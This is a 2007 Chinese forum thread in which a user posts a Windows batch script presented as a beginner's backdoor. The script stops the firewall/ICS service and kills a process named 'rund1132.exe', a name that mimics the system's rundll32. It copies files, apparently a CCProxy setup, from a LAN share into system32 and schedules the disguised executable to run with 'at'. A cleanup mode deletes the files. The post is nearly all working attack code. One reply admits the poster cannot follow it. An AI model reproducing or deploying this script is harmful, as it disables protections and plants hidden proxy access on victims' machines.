中国DOS联盟论坛 - Powered by Discuz! Board

标题: 新手学写批处理后门 [打印本页]

作者: world615 时间: 2007-10-18 10:24 标题: 新手学写批处理后门

@echo off
set p=\\192.168.0.%1\share\....\*.*
set p2=%systemroot%\system32\
set cm1=net stop sharedaccess
set cm2=taskkill /im "rund1132.exe" /F
set cm3=ping 127.0.0.1 -n 3
set cho=%2
if "%cho%"=="/i" goto i
if "%cho%"=="/d" goto d

:i
net start | find /I "ICS" >nul && %cm1% >nul
tasklist | find /I "rund1132.exe" >nul && %cm2% >nul && %cm3% >nul
copy %p% %p2% /y >nul && goto get_time
exit

:d
tasklist | find /I "rund1132.exe" >nul && %cm2% >nul && %cm3% >nul
del %p2%rund1132.exe
del %p2%CCProxy.ini
del %p2%AccInfo.ini
del %p2%CDial.dll
exit

:get_time
set h=%time:~0,2% & set m=%time:~3,2%
  if "%h:~0,1%"=="0" set h=%h:~1,1%
  if "%m:~0,1%"=="0" set m=%m:~1,1%
set /a m+=1
  if "%m:~0,2%"=="60" (set /a h+=1 & set m=00)
  if "%h:~0,2%"=="24" set t=00
set st=%h%:%m%
set st=%st: =%
at %st% cmd /c "rund1132.exe" >nul
exit

作者: Lick 时间: 2007-10-19 01:16
呵呵，太高了，还看不明白``